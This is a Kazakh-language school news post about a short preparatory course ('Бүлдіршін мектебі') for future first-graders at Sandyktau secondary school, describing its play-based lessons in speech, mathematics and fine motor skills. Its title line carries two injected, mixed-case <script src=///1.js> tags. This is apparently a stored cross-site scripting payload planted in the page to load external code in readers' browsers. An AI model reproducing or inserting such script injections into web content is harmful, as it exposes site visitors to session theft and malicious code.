Мектепке дайындық<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

23.08.2019

Мектепте оқу- балалардың өміріндегі әлеуметтік, физиологиялық ең қиын және жауапты кезең. Бұл өмірдің жаңа шарты ғана емес – жаңа қатынастар, жаңа міндеттер. Баланың өмірі өзгереді: бәрі мектепке, оқуға, мектептің істріне бағынады. Баланың мектепке бейімделенуі – бүкіл ағзаның күшейтілетін ұзақ процессі. Осы мәселе бойынша дұрыс ұйымдастырылған жұмыс- баланың табысты оқуының кепілі.

15 тамыздан бастап «Сандықтау орта мектебі» ММ «Бүлдіршін мектебі» - болашақ бірінші сынып оқушылары мектебі есігін ашты. Көптеген ата-аналар «Бүлдіршін мектебін» мектепке дейінгі сыныппен шаталастырады.  Негізінде бұл 1-сыныпқа дайындайтын қысқамерзімдік курстар, жыл сайын әр мектепте ашылады.

         Осы курстар1-сыныпқа баратын оқушылар үшін қажет, мектеп өміріне бейімделуге қажет.

«Бүлдіршін мектебінде» күніне 25-30 минуттан 3 сабақ өтеді:

  • Тіл дамыту және сауаттылыққа дайындау.
  • Математика
  • Қолдың кіші моторикасын дамыту.

Сабақтың негізінде жүргізуші (ойын) әрекеті принципі жатыр. Ойын арқылы балалар «дыбыс», «буын», «сөз», «сөйлем», «әріп» мағынасын ұғып, мақал-мәтелдердегі мдыбыстарды дұрыс айтып, тазасөйлеу шығармасына қатысады, графикалық диктанттар орындайды, сюжеттік картиналар сериялары бойынша сөйлем және әңгіме құрып үйренеді.


Просмотров: 1054


Пікір қосу



Деректерді қолтаңбаға қосу